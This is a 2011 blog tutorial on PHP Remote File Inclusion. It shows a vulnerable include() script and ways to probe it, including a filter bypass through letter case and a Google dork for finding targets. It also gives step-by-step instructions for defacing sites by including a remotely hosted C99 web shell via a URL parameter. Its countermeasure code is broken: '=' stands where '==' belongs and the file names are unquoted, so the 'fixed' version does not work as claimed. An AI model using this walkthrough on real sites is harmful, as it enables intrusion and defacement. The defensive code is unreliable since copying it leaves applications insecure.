Monday, September 5, 2011

Remote File Inclusion(RFI)

What is Remote File Inclusion?

Its a vulnerability found in websites, this kind of vulnerability allows attacker to include and run the remote file(script), and can compromise the system. This vulnerability occurs due to the improper validation of user input. In this tutorial I will be Explaining you "how to perform this attack? and how to avoid or counter this kind of attacks?".
I am using PHP in this tutorial to explain the RMI, the reason is-it is the most widely used language and secondly I am very much comfortable in this language;). And the concept of RMI remains same for all languages.


Understanding RFI:
Before we start we must be familiar with the PHP include() and related functions(require()). This function is used to include or run another page inside current page. Lets see a simple examples to get a clear idea of this function. See the code below:
This is index.php(Exploitable code):

<?php
if(isset($_GET['page']))   //ensures that whether GET argument received any page value.
{
   $page=$_GET['page'];  //store the page to display in a variable
   include($page.".php");  //display the page.
}
else{
?>
<html>
<h1>This is an example for RFI</h1>
click here for <a href="/index.php?page=rfi1">RFI1</a><br/>

click here for <a href="/index.php?page=rfi2">RFI2</a>
</html>
<?
}
?>
If you understand the above code skip the explanation part.

Exaplanation:
Lets say the URL of this page is www.mysite.com/index.php. 
directory structure:
--mysite.com
     |--index.php
     |--rf1.php
     |--rf2.php
You may be thinking what will happen If use this URL in browser first time, well the answer is the image given below.














Now you may be thinking what happened to the php code written in the first few lines.
Lets see: isset($_GET['page'] this function will return true only if the "GET" variable have some "value". And when you go to the url, the GET is null, that means isset() is returning false and that's the reason you have seen the else part of the page which is basic html code. Now the biggest question is what is this "value"? and from where we are going to get this "value"? and the answer is: index.php?page=rfi1(inside the html block) whenever we click this link we are calling index.php page and we are passing a value "rfi1" to the GET variable, That means we are requesting the new page in the same site i.e. rfi1. After you clicked the link the "if" condition is satisfied and it will include the contents of page "rfi1.php" in current page using include() and the url is changed to www.mysite.com/index.php?page=rfi1.


Finding Vulnerability:
The example which i gave is clearly vulnerable lets see how: Consider now I am requesting a page "rfi3" as we know there is no "rfi3" in the directory, then it will show error something like this:















If any website shows such error that means user inputs are not filtered and the page is vulnerable. You may be little confused by this example, lets take simple example for finding whether the page is vulnerable or not?type:www.mysite.com/index.php?page=http://google.com? now if you get google page, the page is clearly vulnerable. If you observed carefully I have used "?" in the URL at the end, the reason is if we don't keep "?" the include() function will certainly include "http://google.com.php"(include($page.".php")) rather then "http://google.com".
Sometimes it is possible that to secure the website programmer checks the GET argument  contain  "http://" or "www", if it is the page won't be included but those programmers can be tricked by using "HTtp://" "WWw" etc..
If the programmer is smart he will convert the whole path to lowercase and checks the same condition.
Note: Sometimes you may get error something like this "http:// wrapper is disabled in the server configuration by allow_url_fopen....'' that means the allow_url_fopen and allow_url_include is turned off in php.ini file, you are pity fucked up in this situation at-least for RFI attack.


Use of Google Dorks To Find Vulnerability: Lets say you want to see if any page of a website(say abc.com) is vulnerable or not. Type:-
site:abc.com  inurl:?page= in Google search, it will return all the pages of the form anything.com?page=anything related to the website abc.com, see dorks to understand this.
Find yourself how to use the dork efficiently for RFI.


How to perform RFI Attack:
Okay, We found the vulnerability now the question is how to hack into the website? To deface a website we need a shell program, Click Here to download C99 Shell, it is program that is used as explorer(same as windows explorer). To have a feel of this script upload it in my3gb.com and access the uploaded url after sign out, you can still be able to manage the files and folder in your account. So, Somehow we have to upload or run this "shell" inside the victims server. If you can upload this script directly upload it and access the path where the file is uploaded. Or we can use our vulnerable page to run the script. First of all upload your shell script in a remote server, lets say we have uploaded in "abc.com/shell.txt". And we have our vulnerable link: www.mysite.com/index.php?page=  now try to access the url:  www.mysite.com/index.php?page=http://abc.com/shell.txt tadaa!! you have access to the "mysite.com" server. You may be wondering why I used "shell.txt" why not "shell.php", the reason is if we use shell.php it will run on remote server rather than victim server which we don't want.


Countermeasures:
1. Always set allow_url_include and allow_url_fopen to "off" in php.ini file unless it is really needed.
2. Filter the input. Example check the GET argument for "http://" or "www". First convert them to lowercase and check whether GET argument contains these.
3. Use select case or else if. Lets see how to modify the same code using IF-ELSE.

<?php
if(isset($_GET['page']))     //ensures that whether GET argument received any page value.
{
   if($_GET['page']="rfi1")
   {
   include(rfi1.php);    //display the page rfi1.
    }
    elseif($_GET['page']="rfi2")
   {
   include(rfi2.php);    //display the page rfi2.
    }
    else{
    include(index.php);   
    }
}
else{
?>
<html>
<h1>This is an example for RFI</h1>
click here for <a href="/index.php?page=rfi1">RFI1</a><br/>
click here for <a href="/index.php?page=rfi2">RFI2</a>
</html>
<?
}
?>
This code ensures that if non of the conditions are satisfied go to else part, that is open index.php

No comments:

Post a Comment